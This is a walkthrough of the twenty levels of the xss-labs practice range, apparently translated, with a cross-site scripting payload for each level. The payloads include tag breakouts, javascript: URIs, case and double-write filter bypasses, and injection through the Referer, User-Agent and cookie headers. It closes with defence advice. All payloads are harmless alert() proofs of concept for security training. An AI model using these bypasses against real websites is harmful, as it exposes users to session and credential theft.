Article directory
- Preface
- 1. The first level
- 2. Second level
- 3. The third level
- 4. The fourth level
- 5. Level 5
- 6. Level 6
- 7. Level 7
- 8. Level 8
- 9. Level 9
- 10. Level 10
- Eleven, eleventh level
- 12. Level 12
- Thirteen, Level Thirteen
- Fourteen, Level Fourteen
- Fifteen, level fifteen
- 16. Level 16
- Seventeen, level seventeen
- Eighteen, Level 18
- Nineteen, level nineteen
- Twenty, twentieth level
- XSS defense methods
Preface
xss-labs is also a shooting range that is very suitable for novices to practice. This issue brings you a shooting range clearance tutorial and introduces the defense methods of xss vulnerabilities and useful xss tools.
Online shooting range:http://test.ctf8.com
XSS automation tool: xsstrike
project Address:https://github.com/s0md3v/XSStrike
1. The first level
There are no restrictions, just enter the xss statement directly
<script>alert('test')</script>
2. Second level
label is closed
"><script>alert('test')</script>
3. The third level
<> symbols are all materialized
Because in the html front-end code, one space is required when using punctuation marks
' onclick=alert('test') '
4. The fourth level
It’s almost the same as the third level, except it’s closed with double quotes.
" onclick=alert('test') "
5. Level 5
Tip: JavaScript pseudo-protocol
Bypass by constructing href attribute
"><a href="javascript:alert('test')">点击</a><"
6. Level 6
Filtered href and tried case bypassing
" Onclick=alert('test') "
7. Level 7
Double write bypass
" OOnnclick=alert('test') "
8. Level 8
html entity encoding bypass
javascript:alert('test')
After encoding
javascript:alert('test')
9. Level 9
This level is really unreasonable
Tip: Check the existence of keywords
http:// must be present, otherwise an error will be reported. The link is illegal (HTML encoding)
javascript:alert('test')/* http:// */
10. Level 10
Tip: Hidden information
By constructing the parameter response, we found that only the value in t_sort has been changed, so we can break through from this tag;
Try to inject malicious code to pop up the window, using the $t_sort parameter
<script>alert('xss')</script>&t_sort=" type="text" onclick="alert('xss')
Eleven, eleventh level
Tips: Referer information
After clearing the packet capture, you can see that the referer header is missing
Add the following code to the referer header
referer: "type="test" onclick="alert('test')
12. Level 12
The injection point is user-agent
user-agent: "type="text" onclick="alert('test')
Thirteen, Level Thirteen
The injection point is cookies, just use bp to capture the packet and write the code in the cookie
"type="text" onclick="alert('test')
Fourteen, Level Fourteen
The fourteenth level will not be demonstrated because the website is no longer accessible.
Fifteen, level fifteen
Seeing src in this level, you can guess that it is a question contained in a file
You can include the previous level and pass parameters to it to achieve the effect of a pop-up window
?src='/level1.php?name=<img src=1 onmouseover=alert()>'
Due to environmental reasons, there are no screenshots. I only included the payload in the next few levels.
16. Level 16
Many tags and some common methods are filtered here
Enter instead of spaces to bypass detection
?keyword=<svg%0Aonload=alert(1)>
Seventeen, level seventeen
There is a problem with the environment, so I skipped it.
?arg02= onclick=alert()
Eighteen, Level 18
Look at the codes of other masters
?arg02= onmousedown=alert()
Nineteen, level nineteen
?arg01=version&arg02=<a href="javascript:alert()">here</a>
Twenty, twentieth level
?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123
XSS defense methods
1、xss过滤函数需过滤<><script></script>等字符
2、xss过滤函数需过滤javascript等关键字
3、xss过滤函数需过滤&#\等字符
4、xss过滤函数需过滤style标签、style属性、expression、javascript、import等关键字
5、避免使用eval、new Function等执行字符串的方法,除非确认字符串和用户输入无关
6、使用cookies的httpOnly属性,加上了这个属性的cookies字段,js是无法进行读写的
7、html实体化编码